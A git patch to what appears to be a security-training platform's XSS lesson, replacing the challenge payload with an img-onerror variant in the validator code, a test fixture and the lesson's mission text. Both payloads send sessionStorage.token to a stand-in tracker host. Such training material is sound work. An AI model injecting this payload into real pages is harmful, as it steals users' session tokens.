From 963e73cecc2fac679f918b170968f2e89bc96415 Mon Sep 17 00:00:00 2001
From: paul-ion <pentesq@gmail.com>
Date: Thu, 28 Sep 2023 21:16:18 -0400
Subject: [PATCH] Change the type of XSS payload

---
 hackerden/front/chat-api.js                                    | 2 +-
 hackerden/front/test/chat.test.js                              | 3 +--
 .../static/lessons/secondDegreeBlackBelt/definitions.json      | 2 +-
 3 files changed, 3 insertions(+), 4 deletions(-)

diff --git a/hackerden/front/chat-api.js b/hackerden/front/chat-api.js
index 8939b043..d5f5f3f0 100644
--- a/hackerden/front/chat-api.js
+++ b/hackerden/front/chat-api.js
@@ -152,7 +152,7 @@ postMessage = async(req,resp) => {
 
 validateMessage = (message, challengeCodeUrl) => {
   //check integrity
-  var toHash = "<script>fetch('https://xss.tracker?token='+sessionStorage.token)</script>"+message.pubKey;
+  var toHash = "<img src=bla onerror=\"fetch('https://xss.tracker?token='+sessionStorage.token)\">"+message.pubKey;
   var hash = crypto.createHash('sha256').update(toHash).digest('hex');
 
   if(message.integrity===hash){
diff --git a/hackerden/front/test/chat.test.js b/hackerden/front/test/chat.test.js
index fd5c061c..c3f5630f 100644
--- a/hackerden/front/test/chat.test.js
+++ b/hackerden/front/test/chat.test.js
@@ -148,8 +148,7 @@ describe('Chat', function () {
     it('should pass challenge for the correct encrypted message', async function () {
         let mockResp = new MockResponse()
         let jwt = chatApi.sign({"sub":"unit_test","permissions":["currentuser","messages"]})
-        let body = {"type":"encMessage","encMess":"OHqH+QeS1rUXqJ+l+DFGzao3XwyuU8PIm2TxcZzkq2AaCte3P6rwJtkPX8BBSQ5WzeP2H8Z9cASgM4BgXRi10IshIHw7J+5DeAYs5MkvVCXodSVSyjZatSstUdjWEiL+YWVhbgH7Yy41+CjufU/dKmV56Phmsgnj1ba270qwlEM=","pubKey":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCm/+WgoP8bEMtSk2XInAM4O7i+Tylrrh+1G4LmyLElbyfZUyqBcvGFrBn7rbX2FxZ6xGegTEjzqcNlnTMACM0CeSyPVZ0dSO13eduhwYFY/IMZ/78JYGLu9H045gVB9Ati+2nRfr/Qlxg7W2WO4Lf1eWOVRX/i46outeXhJo3XdwIDAQAB","date":"2023-09-28, 8:40:43 p.m.","integrity":"e745bbd9037587dead485b997be1d7dba1cfdb6f855ae8d7746828f8c587c1c2"}
-
+        let body = {"type":"encMessage","encMess":"IMVeI6CzUuGCPlmLkC0R4egENfq3jQfXyHnkUSjHz82vDbjXmdWTa7yPMFU3cHkY9dHV8HsboAb+UXJk3JQKkStNa1sgk2R7AmIUHlnv0y8piXvVetUXA5xsqpk5MA251XBjxb4+KVAzRv5EG3B3i0rdg+nwv6WOgzAlq5fGIPo=","pubKey":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWedriMgCBBBChO6WRXRk0nKPrfwrou/kW8MprApyARm9Xk3gU5z5Zlikr3CCp0B+pJx4wzYGSedX4pEXCRDuDhn6KJ7R1vFjX0T+LTBdcMXlNgXkExXjRqWoryeQZJG3MxmOnZ1aikIn4QbIcBxIRyzNBFd5zr7lo5dn/1ahSpQIDAQAB","date":"9/28/2023, 9:01:26 PM","integrity":"779f4468eeb46a5a44848be3da3701ed29098f96170199b51d853b0d52bb8b6f"}
         await chatApi.postMessage({"body":body, "path":"/messages", "headers":{"authorization":`Bearer ${jwt}`}}, mockResp)
         assert.equal(mockResp.statusCode, 200)
         assert.equal(mockResp.responseBody,"Message received.")
diff --git a/trainingportal/static/lessons/secondDegreeBlackBelt/definitions.json b/trainingportal/static/lessons/secondDegreeBlackBelt/definitions.json
index 0e9109af..9cc6cdf2 100644
--- a/trainingportal/static/lessons/secondDegreeBlackBelt/definitions.json
+++ b/trainingportal/static/lessons/secondDegreeBlackBelt/definitions.json
@@ -43,7 +43,7 @@
                 "description": "owasp2017xss.html",
                 "attackGram":"xss.png",
                 "codeBlockIds":["neutralizeOutput","inputAllowListing","requestForgeryPrevention"],
-                "mission":"Alter the html code of the page by inserting the following code: <script>fetch('https://xss.tracker?token='+sessionStorage.token)</script>"
+                "mission":"Alter the html code of the page by inserting the following tag: <img src=bla onerror=\"fetch('https://xss.tracker?token='+sessionStorage.token)\">"
             },
             {
                 "id":"owasp2017injection",